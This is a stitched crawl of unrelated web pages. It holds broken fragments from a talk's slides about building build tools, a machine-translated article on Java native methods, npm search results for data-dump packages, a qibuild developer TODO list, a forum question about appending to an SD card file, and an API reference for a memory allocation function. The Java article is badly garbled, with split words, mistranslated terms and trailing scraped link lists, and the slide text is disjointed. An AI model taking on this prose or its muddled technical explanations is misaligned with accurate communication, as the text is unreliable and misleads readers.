real-time." "Let's look at the snow code again..." @phenomnominal 2020!" @phenomnominal 2020" @phenomnominal 2020?" @phenomnominal 2020 "We didn't create the "doMagic" function yet!" "I think that it should freeze all the molecules!" @phenomnominal 2020 "That's right! And what a great idea!" "Generating code is pretty verbose when you manually create AST tokens..." @phenomnominal 2020 //..." @phenomnominal 2020 "Yeeesh" "You bet we can! We've one last trick up our sleeves!" "We can do better than that can't we Elsa?" @phenomnominal 2020 ?" @phenomnominal 2020 !" @phenomnominal 2020 "That'd be pretty amazing! Does something like that exist for JavaScript?" *clip clop* @phenomnominal 2020 "It sure does!" @phenomnominal 2020 @phenomnominal 2020 @phenomnominal 2020 "That is SO MUCH BETTER!!" @phenomnominal 2020 "It sure is!" "We have much less code to maintain!" "Doing AST-based templating like this also makes it much easier to transplant and clone parts of the tree around! @phenomnominal 2020 "Now all we need to do is convert the AST back into text!" @phenomnominal 2020 "For that, we get to use one more open-source library!" @phenomnominal 2020 @phenomnominal 2020 "Now everyone, we're ready to put all the bits together!" "I'm going to need all your help!" @phenomnominal 2020?" @phenomnominal 2020 !" @phenomnominal 2020 "That was a lot of information" @phenomnominal 2020 "These ideas are the foundation of all tools that help build the internet!" "From Webpack to ESLint, from Sass to Create React App" "And now we can make our own!!" @phenomnominal 2020 "Remember you can use these ideas to modify any source code in any programming language!" @phenomnominal 2020 "Elsa, thank you so much for showing us your magic!" , said "Sven". @phenomnominal 2020 @phenomnominal 2020 "Don't you mean 'technology'?" Everyone laughed, and they started heading back towards Arendelle. , said Anna. The End The End Okay, Bye Okay, Bye - twitter/phenomnominal - github/phenomnomnominal Do You Want to Build a Build Tool? By Craig Spence
https://slides.com/craigspence/do-you-want-to-build-a-build-tool-yglf
CC-MAIN-2022-05
en
refinedweb
One . What is? Native Method Simply speak , One Native Method It's just one. java Call not java Code interface . One Native Method It's such a java Methods : The implementation of this method consists of java Language implementation , such as C. This feature is not java Unique to , Many other programming languages have this mechanism , For example C++ in , You can use it. extern "C" inform C++ The compiler calls a C Function of . "A native method is a Java method whose implementation is provided by non-java code." Defining a native method when , Does not provide an implementer ( It's like defining a java interface), Because its realization is caused by non java Language is realized on the outside ., An example is given below : public class IHaveNatives { native public void Native1( int x ) ; native static public long Native2() ; native synchronized private float Native3( Object o ) ; native void Native4( int[] ary ) throws Exception ; } The declaration of these methods describes some non java The code is in these java What does it look like in the code (view). identifier native With all the others java Identifiers are used together , however abstract With the exception of . It's reasonable , because native Implying that these methods have implementers , It's just that these implementers are right and wrong java Of , however abstract But it clearly indicates that these methods have no implementers .native And others java When identifiers are used together , Its meaning is not Native Method There is no difference , such as native static Indicates that this method can be called directly without producing an instance of the class , It's very convenient , For example, when you want to use a native method To call a C Class library . The third method above uses native synchronized,JVM The synchronization lock mechanism is executed before entering the implementation body of this method ( It's like java The multithreading .) One native method Method can return any java type , Including non basic types , And it can also be used for exception control . The implementers of these methods can make an exception and throw it , This is related to java The method is very similar . When one native method When receiving some non basic types, such as Object Or an integer array , This method can access the interior of these non basic types , But it will make this native The method depends on the java The realization of the class . One thing to keep in mind : We can do it in one native method Access all of the java characteristic , But it depends on what you visit java Implementation of features , And it's not as good as java It's convenient and easy to use those features in a language . native method The existence of does not have any effect on other classes calling these local methods , In fact, the other classes that call these methods don't even know it's calling a local method .JVM Will control all the details of calling local methods . Note that when we declare a local method as final The situation of . use java When the implemented method body is compiled, the efficiency may be improved due to inlining . But one native final It is doubtful whether the method can also obtain such benefits , But it's just a matter of code optimization , There is no impact on function implementation . If a class containing local methods is inherited , The subclass inherits the local method and can use java Language rewrites this method ( This seems strange ), Similarly, if a local method is fianl identification , It can't be rewritten after it's inherited . Local methods are very useful , Because it effectively expands jvm. in fact , What we wrote java The code already uses local methods , stay sun Of java Concurrent ( Multithreading ) In the implementation of the mechanism , Many of the contact points with the operating system use local methods , This makes java Programs can go beyond java The boundaries of runtime . With local methods ,java Programs can do tasks at any application level . Two . Why use Native Method java It is very convenient to use , However, some levels of tasks use java It's not easy to implement , Or when we care about the efficiency of the program , Here's the problem . And java Environmental diplomacy is mutual : Sometimes java Applications need to be associated with java The outside environment interacts . This is the main reason for the existence of local methods , You can think about java The situation in which information needs to be exchanged with some underlying system, such as the operating system or some hardware . The local approach is just such a communication mechanism : It provides us with a very simple interface , And we don't have to understand java Trivial details beyond the application . Interact with the operating system : JVM Supporting java The language itself and the runtime library , It is java The platform on which programs live , It has an interpreter ( Interpret bytecode ) And some libraries linked to local code . But anyway sample , It's not a complete system after all , It often depends on the bottom (underneath In the following ) System support . These underlying systems are often powerful operating systems . By using local methods , We can use java Realized jre Interaction with the underlying system , even to the extent that JVM Part of it is to use C Written , also , If we're going to use some java When the language itself does not provide encapsulated features of the operating system , We also need to use local methods . Sun's Java Sun The interpreter of C Realized , This makes it look like something ordinary C Interact with the outside as well .jre Mostly with java Realized , It also interacts with the outside world through some local methods . for example : class java.lang.Thread Of setPriority() The method is to use java Realized , But it calls the local methods in the class setPriority0(). This method is local C Realized , And implanted JVM Inside , stay Windows 95 On the platform , This local method will eventually call Win32 SetPriority() API. This is a concrete implementation of a local method by JVM Provide directly , More often than not, local methods are made up of external DLL (external dynamic link library) Provide , Then be JVM call . 3、 ... and .JVM How to make Native Method Run : We know , When a class is used for the first time , The bytecode of this class will be loaded into memory , And it will only load back once . At the entry of the loaded bytecode is maintained a list, These method descriptors contain such information : Where does the method code exist , What parameters does it have , Method descriptor (public And so on ) wait . If a method descriptor contains native, The descriptor block will have a pointer to the implementation of the method . These are implemented in some DLL In the file , But they will be loaded by the operating system into java The address space of the program . When a class with a local method is loaded , Its related DLL Not loaded , So the pointer to the method implementation is not set . Before the local method is called , these DLL Will be loaded , This is done by calling java.system.loadLibrary() Realized . The last thing you need to know is , There is an overhead in using local methods , It lost java A lot of the benefits of . If there's no choice , We can choose to use local methods . Reference resources : JAVA Details of local methods , What is? JAVA Local method ? More articles about - Java Detailed explanation of interview questions :java Keywords in One ,final1. By final Decorated classes cannot be inherited 2. By final The decorated method cannot be overridden 3. By final Modified variables cannot be changed The point is the third sentence . By final Modified variables cannot be changed , What can't be changed ... - $.ajax() Methods, jquery Medium ajax Method jquery Medium ajax Method parameters are always forgotten , Here is a record of . 1.url: Requirements for String Parameters of type ,( The default is the current page address ) Address to send request . 2.type: Requirements for String Parameters of type , Request mode (p ... - Java Improve ——equals() And hashCode() Methods, java.lang.Object There are two very important methods in the class : 1 2 public boolean equals(Object obj) public int hashCode() Object Class is the successor of class ... - Use Java How to operate a text file Use Java How to operate a text file Abstract : first java Text file processing is not supported , In order to make up for this defect, we introduced Reader and Writer Two classes first java Text file processing is not supported , In order to make up for this defect ... - Java Detailed explanation of memory structure Java Detailed explanation of memory structure Java Divide memory into : Stack memory , Heap memory , Method area , Local method area and register, etc . Next, we will introduce stack memory , Heap memory , The method area has its own characteristics : 1. Stack memory (1) Some basic types of variables and object reference variables are in functions ... - Java volatile Keyword details Java volatile Keyword details volatile yes java One of the keywords in , Used to decorate variables . The variable modified by this key can prevent the instruction of this variable from being rearranged , And keep memory visible . In short, its function is : Prohibition refers to ... - $.ajax() Methods, jquery $.ajax() Methods, jquery Medium ajax Method parameters are always forgotten , Here is a record of . 1.url: Requirements for String Parameters of type ,( The default is the current page address ) Address to send request . 2.type: Requirements for Str ... - jQuery in $.ajax() Methods, $.ajax() Methods, jquery Medium ajax Method parameters are always forgotten , Here is a record of . 1.url: Requirements for String Parameters of type ,( The default is the current page address ) Address to send request . 2.type: Requirements for Strin ... - $.ajax() Methods, ajax And async attribute 【 original 】 Detailed case analysis —— Talking about Redis Common use of cache 5 Ways of planting (String,Hash,List,set,SetSorted ) $.ajax() Methods, jquery Medium ajax Method parameters are always forgotten , Here is a record of . 1.url: Requirements for String Parameters of type ,( The default is the current page address ) Address to send request . 2.type: Requirements for Str ... - jQuery - Ajax ajax Methods, $.ajax() Methods, jquery Medium ajax Method parameters are always forgotten , Here is a record of . 1.url: Requirements for String Parameters of type ,( The default is the current page address ) Address to send request . 2.type: Requirements for Strin ... Random recommendation - java High tech - operation javaBean 1. Yes javaBean Simple introspective operation of public class IntroSpectorTest { public static void main(String[] args) throws Ex ... - cmd The working directory of the running program As shown in the figure ,cmd By entering the actual path of your own program , Or put the program in an environment variable and then in cmd In the implementation of , use start perform , The working directory of the program is cmd Current directory : stay cmd Enter a shortcut to the program in to execute the program , ... - buildroot add to ssh, And the use of stftp service The last article about buildroot Basic operation , This chapter starts at once SSH Services and configuration sftp service , And static IP Set up . To configure : make menuconfig Target packages ---& ... - AngularJS-- Learning notes ( One ) AngularJS The official website provides a sample project for learning :PhoneCat. This is a Web application , Users can browse some Android mobile phone , Learn more about them , And search and sort . about PhoneCat Project ... - RTP Protocol analysis Catalog (?)[-] The first 1 Chapter RTP summary RTP What is it? RTP Application environment Relevant concepts Streaming media The first 2 Chapter RTP Detailed explanation RTP The protocol hierarchy of The sublayer of the transport layer Part of the application layer RTP Encapsulation RTCP Of ... - .net Software Engineer interview questions ( Refer to the answer ) One . Completion ( Every empty 1 branch , common 12 branch ) 1 Object oriented languages have __ encapsulation ______ sex .__ Inherit _______ sex .__ polymorphic ______ sex . 2 It works foreach Traversing the accessed object needs to be implemented ____Ienumerab ... - Cocos2d-x 3.0final Terminator series tutorial 14-L new abel-Cocos2d-x Document Objective record New text tag class Label Other text tags Introduction to the use of font making tools Summary ... - ResolveUrl in ASP.NET - The Perfect Solution original text :ResolveUrl in ASP.NET - The Perfect Solution If you are looking for ResolveUrl outside of Page/Co ... - hdu_5890_Eighty seven(bitset Optimize DP) Topic link :hdu_5890_Eighty seven The question : 50 Number ,10W A asked , Delete the second paragraph every time you ask i,j,k After the count , Is there an alternative 10 The sum of the numbers is 87 The plan , Just output ’Yes’ perhaps ’No’ Answer key : ... - Matplotlib The problem of Chinese display Original address : #Matplotlib There is something wrong with the Chinese display , Of course, you can modify the configuration file matplotlibrc ...
https://chenhaoxiang.cn/2021/06/20210604170500513P.html
CC-MAIN-2022-05
en
refinedweb
277 packages found Stringify an object/array like JSON.stringify just without all the double-quotes A string manipulation toolbox, featuring a string formatter (inspired by sprintf), a variable inspector (output featuring ANSI colors and HTML) and various escape functions (shell argument, regexp, html, etc). import and export tools for elasticsearch - elasticsearch - dump - elasticdump - import - export - transfer - migrate - migration - elasitic - cluster - elastic-dump - elastic dump Handlebars utility helper to output a navigable, visual representation of data Stream SQL dump to newline delimited json Dump Mysql, Postgres, SQLServer, and ElasticSearch databases directly to AWS S3, Google Cloud Storage, or Azure. Convert an object or array into a formatted string A nodejs package to quickly dumb DB to file. Supports Mysql, PostgreSQL, MongoDB and SQLite A Node function to connect into MongoDB, get documents from collection by name and save the content to CSV file. Store your sensitive informations in .env or inject from pipeline are good pratices and this way i did. ### Install ```sh npm i mongo-dump-col A Promise-based client for the 'Have I been pwned?' service. A better and pretty variable inspector for your Node.js applications. putout formatter stores output and dump it on end Get all the values from a contract in the blockchain, optionally transformed as desired Dump records from mongo to elastic httpdumper is a library that will help you debugging your http request. PouchDB Load - load dumped CouchDB/PouchDB databases on the client Dumps all values and/or keys of a level db or a sublevel to the console. Export a PostgreSQL schema as JSON A nodejs package to quickly dumb DB to file. Supports Mysql, PostgreSQL, MongoDB and SQLite
https://www.npmjs.com/search?q=keywords:dump
CC-MAIN-2022-05
en
refinedweb
Below you can find a list of tasks that are not worth putting in a bug tracker. Mostly because they involve some refactoring, or because they would cause so many changes we are not sure if/when we will tackle them. Feel free to add your own ideas here. CMake ¶ qi_stage_lib/qi_use_lib ¶ - Handle package versions? - Use new CMake 2.8.11 features - avoid using the cache for global variables and use global properties instead Use a build ‘prefix’ ¶ qibuild does lots of black magic so that you can find dependencies and headers paths from the sources and build dir of your project, without using the “global cmake registry” or any other tricks. However: - this means you can have problems with your headers install rules and not see them - this also means you cannot easily depend of a project not using qibuild (even if it uses CMake), or a project using autotools The solution is simple: After building a dependency, install it to QI_WOKTREE/root and just set CMAKE_INSTALL_PREFIX to QI_WOKTREE/root This will work with any build system, (provided they have correct install rules), and will force people to have correct install rules. Make it easier to use 3rd party cmake module ¶ Say you find a foo-config.cmake somewhere... If you try to do find_package(FOO) qi_create_bin(bar) qi_use_lib(bar FOO) This may or may not work: it depends of what the foo-config.cmake does: qi_use_lib , qi_stage_lib expects some variables ( FOO_INCLUDE_DIRS , FOO_LIBRARIES ) to be in the cache It may be cleaner to add a qi_export function find_package(FOO) # works out of the box if foo follows CMake conventions qi_export(foo) # can specify alternative variable names (here the case is wrong) qi_export(foo LIBRARIES ${Foo_LIBRARY} ) Make it easier to stage and use header-only libraries ¶ Basically, go from find_package(EIGEN3) include_directories(${EIGEN3_INCLUDE_DIRS}) include_directories("include") qi_stage_header_only_lib(foo DEPENDS EIGEN3) To qi_create_header_only_lib(foo ${public_headers}) qi_use_lib(foo EIGEN3) qi_stage_lib(foo) where foo is a header-only library depending on Eigen3 Command line ¶ - add group for every action parser, or only display the options specific to the given action when using qibuild <action> –help - add a “path” type in argparse so that (on Windows at least) we: - always convert to lower case - check for forbidden characters - make output more consistent (use the same color for the same thing everywhere for starters), this probably means extending the qisys.uiAPI - make qisrc initworks with a local directory containing a worktree (maybe qisrc clone). but init seems better. “Are you a manifest git repo? No? So clone all.” - make git dependency optional qibuild ¶ qibuild configshould list the available build profiles - fix linker problems when using toolchain and third party libraries on mac - fix Xcode support and other “multi-configuration” IDE by having two SDK_DIRS(one debug, one release) in the same build directory - handle custom build directory - qibuild deploy: fix gdb configuration files generation - add qibuild find -zto look in every build directory - Better integration with QtCreator: - Write our own plugin to avoid the “CMakeList” pop-up (it only re-runs CMake to generate an XML code-blocks file, that is then re-parsed by QtCreator) - Match qitoolchain configurations with QtCreator’s kits - Automatically configure tests when they take arguments qisrc ¶ - mirroring qisrc manifests. (Same repos, same review, but an other “base URL”) - use --depthoption when cloning. May speed up the initial clone Python ¶ Port to Python3 ¶ It’s the future ! We already removed compatibility with Python 2.6 , and python3 is now the default version on most linux distros. Renames ¶ - XMLParser.xml_elem() -> dump() - XMLParser._write_foo() -> _dump_foo() - rewrite qibuild.config using XMLParser - rename qibuild.config -> qibuild.xml_config? - choose between destdir and dest_dir - qisrc.status.check_state(project, untracked) -> qisrc.status.check_state(project, untracked=False) - what we call “zombies” in the implementation of qibuild testare actually orphans (see ), so we should fix the code accordingly. Plus this means we can write a kill_orphansmethod :) tests ¶ - Document pytestfixtures: we have tons of them, and some of them are very magic - Replace qibuild_action(“configure”) with a nicer syntax: - qibuild_action.call(“configure”)? - qibuild_action.configure(”...”)? - fix running automatic tests on mac misc ¶ parser.get_* functions should be usable with **kwargstoo: def get_worktree(args=None, **kwargs): options = dict() if args: options = vars(args[0]) else: options = kwargs qisrc.parser.get_projects(worktree, args)-> qisrc.parser.get_projects(args)(just get the worktree from the args) replace qisys.interact.ask_choiceInstead of a return_intoption, use something like: ask_choice(message, choices, display_fun=None, allow_none=False) display_funwill be called on each choice to display them to the user, returning either an element from the choices list, or None if the user did not enter anything and allow_noneis True Use same API as shutilin qisys.shand qisys.archive: - qisys.command.find -> qisys.command.which - qisys.command.archive ->
https://developer.softbankrobotics.com/hacking-qibuild/contributing-qibuild/qibuild-todo
CC-MAIN-2022-05
en
refinedweb
FauxpenShift This cli utility creates a Kubernetes cluster using KIND (KIND runs Kubernetes in a containers) and installs the OpenShift Router on top of it. This is useful for when you want to test your applications using OpenShift routes, but CRC is too heavy. Prerequisites At a minimum - Docker or Podman (podman is experimental) - Access to Nip.io While you don’t need the kind CLI, you do need to satisfy all the prereqs for KIND. If you’re having trouble see their official docs. Running it Download the CLI from and put it in your path. Linux sudo wget -O /usr/local/bin/fauxpenshift Mac OS (Intel) sudo wget -O /usr/local/bin/fauxpenshift Make it executable sudo chmod +x /usr/local/bin/fauxpenshift Bash completion if you wish source <(fauxpenshift completion bash) Create a Kubernetes cluster with an OpenShift Router: fauxpenshift create NOTE To use Podman run: sudo KIND_EXPERIMENTAL_PROVIDER=podman fauxpenshift create You should have a Kubernetes Cluster with the router running NOTE If using Podman, you must extract the kubeconfig config by runnning: sudo fauxpenshift kubeconfig oc get pods -n openshift-ingress Testing It Now let’s create an app and expose a route. First create a namespace oc create ns welcome-app Create a deployment in this namespace oc create deployment welcome-php \ --image=quay.io/redhatworkshops/welcome-php:latest -n welcome-app Create a service for this deployment oc expose deployment welcome-php --port=8080 --target-port=8080 -n welcome-app Now create a route oc expose svc/welcome-php -n welcome-app Patch things that the oc expose didn’t 100% get you. NOTE: You only need to do this if you’re doing this from scratch. If you have a “known good” YAML for your application it should “just work” kubectl patch route welcome-php -n welcome-app --type=json -p='[{"op": "add", "path": "/spec/to/kind", "value":"Service"}]' kubectl patch route welcome-php -n welcome-app --type=json -p='[{"op": "add", "path": "/spec/wildcardPolicy", "value":"Subdomain"}]' Get your route oc get route -n welcome-app Curl it (or open it up in a browser) curl -sI get route welcome-php -n welcome-app -o jsonpath='{.status.ingress[0].host}') Clean Up Delete your cluster fauxpenshift destroy NOTE If using Podman, run: sudo KIND_EXPERIMENTAL_PROVIDER=podman fauxpenshift destroy
https://golangexample.com/fauxpenshift-a-kubernetes-cluster-the-openshift-router/
CC-MAIN-2022-21
en
refinedweb
Convenient soft-deletion support for Django models Project description About A Django field that enables convenient soft-deletion. For Python 2.7/3.3+ and Django 1.8+ Installation Simple: pip install django-livefield. Example Usage >>> from django.db import models >>> from livefield import LiveField, LiveManager >>> >>> >>> class Person(models.Model): ... name = models.CharField() ... live = LiveField() ... ... objects = LiveManager() ... all_objects = LiveManager(include_soft_deleted=True) ... ... class Meta: ... unique_together = ('name', 'live') ... ... def delete(self, using=None): ... self.live = False ... self.save(using=using) ... >>> john = Person.objects.create(name='John Cleese') >>> doppelganger = Person(name='John Cleese') >>> doppelganger.save() # Raises an IntegrityError >>> john.delete() >>> doppelganger.save() # Succeeds! License MIT. See LICENSE.txt for details. Contributing Pull requests welcome! To save everyone some hassle, please open an issue first so we can discuss your proposed change. In your PR, be sure to add your name to AUTHORS.txt and include some tests for your spiffy new functionality. Travis CI will green-light your build once it passes the unit tests (./setup.py test) and our linters (./lint.sh). Changelog 3.3.0 - Django 3.x support - switch to BooleanField as base (Django 4.x deprecation) 3.2.1 - Fix rST formatting in this file to pass PyPI rendering check 3.2.0 (Not released) - Support Django 2.2 - Support Python 3.7 - Fix metadata to remove deprecated Django versions - Expand travis tests for versions and database engines - Remove obsolete pylint suppressions - Thanks to [@shurph]( for the above! 3.1.0 - Fix [deprecation of context param for Field.from_db_value]( - Support for Django 2.1 (Thanks [@lukeburden]( - Switch tests suite to use pytest - Remove pylint-django plugin, no longer needed 3.0.0 - Add support for Python 3.6 - Add support for Django 2.0 - Remove support for Python 3.4 - Remove support for old Django versions - Remove GIS 2.5.0 (Not released) - Added official Python 3 support. - Re-added support for Django 1.8. Now supports Django 1.8 and 1.9. 2.4.0 (2016-02-11) - Drop support for Django 1.8 - Add number of affected rows for delete methods (hard_delete, soft_delete, delete). Note: Django 1.9+ only. 2.1.0 (2014-09-04) - Add support for Django 1.7. 2.0.0 (2014-07-13) - Renamed top-level namespace to livefield. - Restructured internally to match Django convention. - Added GIS support. - Added South support. 1.0.0 (2014-02-14) - Initial release. - Separated existing code from main application repository. Developed and maintained by Hearsay Social, Inc.. Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages. Source Distribution django-livefield-3.3.0.tar.gz (6.3 kB view hashes)
https://pypi.org/project/django-livefield/
CC-MAIN-2022-21
en
refinedweb
How does the "view" method work in PyTorch? The view function is meant to reshape the tensor. Say you have a tensor import torcha = torch.range(1, 16) a is a tensor that has 16 elements from 1 to 16(included). If you want to reshape this tensor to make it a 4 x 4 tensor then you can use a = a.view(4, 4) Now a will be a 4 x 4 tensor. Note that after the reshape the total number of elements need to remain the same. Reshaping the tensor a to a 3 x 5 tensor would not be appropriate. What is the meaning of parameter -1? If there is any situation that you don't know how many rows you want but are sure of the number of columns, then you can specify this with a -1. (Note that you can extend this to tensors with more dimensions. Only one of the axis value can be -1). This is a way of telling the library: "give me a tensor that has these many columns and you compute the appropriate number of rows that is necessary to make this happen". This can be seen in the neural network code that you have given above. After the line x = self.pool(F.relu(self.conv2(x))) in the forward function, you will have a 16 depth feature map. You have to flatten this to give it to the fully connected layer. So you tell pytorch to reshape the tensor you obtained to have specific number of columns and tell it to decide the number of rows by itself. Drawing a similarity between numpy and pytorch, view is similar to numpy's reshape function. Let's do some examples, from simpler to more difficult. The viewmethod returns a tensor with the same data as the selftensor (which means that the returned tensor has the same number of elements), but with a different shape. For example: a = torch.arange(1, 17) # a's shape is (16,)a.view(4, 4) # output below 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16[torch.FloatTensor of size 4x4]a.view(2, 2, 4) # output below(0 ,.,.) = 1 2 3 45 6 7 8(1 ,.,.) = 9 10 11 1213 14 15 16[torch.FloatTensor of size 2x2x4] Assuming that -1is not one of the parameters, when you multiply them together, the result must be equal to the number of elements in the tensor. If you do: a.view(3, 3), it will raise a RuntimeErrorbecause shape (3 x 3) is invalid for input with 16 elements. In other words: 3 x 3 does not equal 16 but 9. You can use -1as one of the parameters that you pass to the function, but only once. All that happens is that the method will do the math for you on how to fill that dimension. For example a.view(2, -1, 4)is equivalent to a.view(2, 2, 4). [16 / (2 x 4) = 2] Notice that the returned tensor shares the same data. If you make a change in the "view" you are changing the original tensor's data: b = a.view(4, 4)b[0, 2] = 2a[2] == 3.0False Now, for a more complex use case. The documentation says that each new view dimension must either be a subspace of an original dimension, or only span d, d + 1, ..., d + k that satisfy the following contiguity-like condition that for all i = 0, ..., k - 1, stride[i] = stride[i + 1] x size[i + 1]. Otherwise, contiguous()needs to be called before the tensor can be viewed. For example: a = torch.rand(5, 4, 3, 2) # size (5, 4, 3, 2)a_t = a.permute(0, 2, 3, 1) # size (5, 3, 2, 4)# The commented line below will raise a RuntimeError, because one dimension# spans across two contiguous subspaces# a_t.view(-1, 4)# instead do:a_t.contiguous().view(-1, 4)# To see why the first one does not work and the second does,# compare a.stride() and a_t.stride()a.stride() # (24, 6, 2, 1)a_t.stride() # (24, 2, 1, 6) Notice that for a_t, stride[0] != stride[1] x size[1] since 24 != 2 x 3 view() reshapes a tensor by 'stretching' or 'squeezing' its elements into the shape you specify: How does view() work? First let's look at what a tensor is under the hood: Here you see PyTorch makes a tensor by converting an underlying block of contiguous memory into a matrix-like object by adding a shape and stride attribute: shapestates how long each dimension is stridestates how many steps you need to take in memory til you reach the next element in each dimension view(dim1,dim2,...)returns a view of the same underlying information, but reshaped to a tensor of shape dim1 x dim2 x ...(by modifying the shapeand strideattributes). Note this implicitly assumes that the new and old dimensions have the same product (i.e. the old and new tensor have the same volume). PyTorch -1 -1 is a PyTorch alias for "infer this dimension given the others have all been specified" (i.e. the quotient of the original product by the new product). It is a convention taken from numpy.reshape(). Hence t1.view(3,2) in our example would be equivalent to t1.view(3,-1) or t1.view(-1,2).
https://codehunter.cc/a/python/how-does-the-view-method-work-in-pytorch
CC-MAIN-2022-21
en
refinedweb
Is there any way to kill a Thread? It is generally a bad pattern to kill a thread abruptly, in Python, and in any language. Think of the following cases: - the thread is holding a critical resource that must be closed properly - the thread has created several other threads that must be killed as well. The nice way of handling this, if you can afford it (if you are managing your own threads), is to have an exit_request flag that each thread checks on a regular interval to see if it is time for it to exit. For example: import threadingclass StoppableThread(threading.Thread): """Thread class with a stop() method. The thread itself has to check regularly for the stopped() condition.""" def __init__(self, *args, **kwargs): super(StoppableThread, self).__init__(*args, **kwargs) self._stop_event = threading.Event() def stop(self): self._stop_event.set() def stopped(self): return self._stop_event.is_set(): def _async_raise(tid, exctype): '''Raises an exception in the threads with id tid''' if not inspect.isclass(exctype): raise TypeError("Only types can be raised (not instances)") res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(ctypes.c_long(tid), None) raise SystemError("PyThreadState_SetAsyncExc failed")class ThreadWithExc(threading.Thread): '''A thread class that supports raising an exception in the thread from another thread. ''' def _get_my_tid(self): """determines this (self's) thread id CAREFUL: this function is executed in the context of the caller thread, to get the identity of the thread represented by this instance. """ # TODO: in python 2.6, there's a simpler way to do: self.ident raise AssertionError("could not determine the thread's id") def raiseExc(self, exctype): """Raises the given exception type in the context of this thread. If the thread is busy in a system call (time.sleep(), socket.accept(), ...), the exception is simply ignored. If you are sure that your exception should terminate the thread, one way to ensure that it works is: t = ThreadWithExc( ... ) ... t.raiseExc( SomeException ) while t.isAlive(): time.sleep( 0.1 ) t.raiseExc( SomeException ) If the exception is to be caught by the thread, you need a way to check that your thread has caught it. CAREFUL: this function is executed in the context of the caller thread, to raise an exception in the context of the thread represented by this instance. """ _async_raise( self._get_my_tid(), exctype ) (Based on Killable Threads by Tomer Filiba. The quote about the return value of PyThreadState_SetAsyncExc appears to be from an old version of Python.) As noted in the documentation, this is not a magic bullet because if the thread is busy outside the Python interpreter, it will not catch the interruption. A good usage pattern of this code is to have the thread catch a specific exception and perform the cleanup. That way, you can interrupt a task and still have proper cleanup. There is no official API to do that, no. You need to use platform API to kill the thread, e.g. pthread_kill, or TerminateThread. You can access such API e.g. through pythonwin, or through ctypes. Notice that this is inherently unsafe. It will likely lead to uncollectable garbage (from local variables of the stack frames that become garbage), and may lead to deadlocks, if the thread being killed has the GIL at the point when it is killed. and all queue.Queue with multiprocessing.Queue and add the required calls of p.terminate() to your parent process which wants to kill its child p See the Python documentation for multiprocessing. Example: import multiprocessingproc = multiprocessing.Process(target=your_proc_function, args=())proc.start()# Terminate the processproc.terminate() # sends a SIGTERM
https://codehunter.cc/a/python/is-there-any-way-to-kill-a-thread
CC-MAIN-2022-21
en
refinedweb
Appending data on an SD card file Hi All, I am trying to create a simple data-logger using some very simple sensor inputs as a test. I am using the “SD” and “os” modules to write values to a text file on an SD card on the pymakr board. I can mount it and then open the file to successfully write to the card, however, when I close and then re-open the file when I want to write to again it overwrites my original data. Is there any way to append the data in the file instead of overwriting? I can't to keep the file open as I might want to turn the logger off and on over different sessions. I also don’t want to “readall()” my existing data into RAM, append, then re-write the entire data-set as this is ugly, slow and I might have a large amount of data which could crash the system. Seems like pretty standard functionality to miss out, if this is the case. I also noticed that there is not a delete file function mentioned in the “os” module which is what the “SD” example code uses, but there is a similar module called “uos” in which you can. Does anyone know why there are two similar “uos” and “os” modules despite being somewhat redundant and why “os” is not in the documentation? Can anyone clarify this for me please? Thanks in advance.. Hi, uos is the micropython version of the os library. When you do import os, it is actually just an alias and it really imports uos. This is for compatibility with existing python code. If you go to the REPL on your device and run import uos dir(uos) import os dir(os) You will see the lists are identical. If we are missing documentation for some of the methods I will add it to my to-do list to add this documentation. Ah excellent, that's an easy solution! Thanks again Robert :)
https://forum.pycom.io/topic/2159/appending-data-on-an-sd-card-file
CC-MAIN-2022-21
en
refinedweb
Break the text on the proposals with the retention of the divider It may be limited to the conclusion of the proposal: "start letter" or "or"? For example: "Hi! I'm a simple text. Can you share me?" ['Hi,'I'm a simple text.', 'Can you separate me?' There was an attempt, but it was a bad one: re.split(r'\w[.!?]+\s+[А-Я]', "Hello! I'm John. Are you OK? fine... and so") It's a gap, but it's used. To make sure there's a letter in front of the protein, and... import re result = re.split(r'(?<=\w[.!?]) ', "Hello! I'm John. Are you OK? fine... and so") print (result) result = re.split(r'(?<=\w[.!?]) ', ?") print (result) Result: ['Hello!', "I'm John.", 'Are you OK?', 'fine... and so'] [?'] P. S. I didn't check on Junicode. Testing. UPD \wPerhaps to be replaced by the listing of permissible symbols, as these may be letters, figures and sign♪
https://software-testing.com/topic/892837/break-the-text-on-the-proposals-with-the-retention-of-the-divider
CC-MAIN-2022-21
en
refinedweb
ec_malloc_size Name ec_malloc_size — Allocate a block of memory of arbitrary size Synopsis #include "ec_malloc.h" void * **ec_malloc_size** ( | object_type, | | | | size ); | | Description Allocate a block of memory of arbitrary size. The memory is uninitialized. Note This function is only valid with VSIZE memory type, not a fixed size type. For more information about memory types see Memory Types. The system will use the locally configured allocator to satisfy the allocation, but this choice will be overridden by the setting of the malloc2mmap_threshold setting. Since 3.0.25, the behavior of malloc2mmap_threshold is as follows: If malloc2mmap_threshold is set to "auto" in the configuration file (this is equivalent to -1), and the allocator is set to use the system allocator (malloc), then the threshold value is assumed to be 4092. If the allocator is not malloc, then the threshold value is assumed to be "off" (0). If the option is configured with any other value, then that value is used as the threshold. Any sized allocation where SIZE exceeds the effective threshold value will be satisfied using the mmap system call. In versions prior to 3.0.25, the malloc2mmap_threshold is ignored unless the allocator is set to the system allocator. The default value is 4092. In all versions, if the effective threshold value is 0, then mmap() will not be used directly by ec_malloc_size allocations, although the underlying allocator may opt to use mmap itself. Regardless of whether mmap() is used directly or indirectly by ec_malloc_size, the memory returned from this function must only be freed using ec_free. - object_type This parameter is an integer indicating a memory type as defined in the section called “Memory Types”. - size A size_ttype unsigned integer. This function returns a void pointer to the memory location. It is legal to call this function in any thread.
https://support.sparkpost.com/momentum/3/3-api/apis-ec-malloc-size
CC-MAIN-2022-21
en
refinedweb
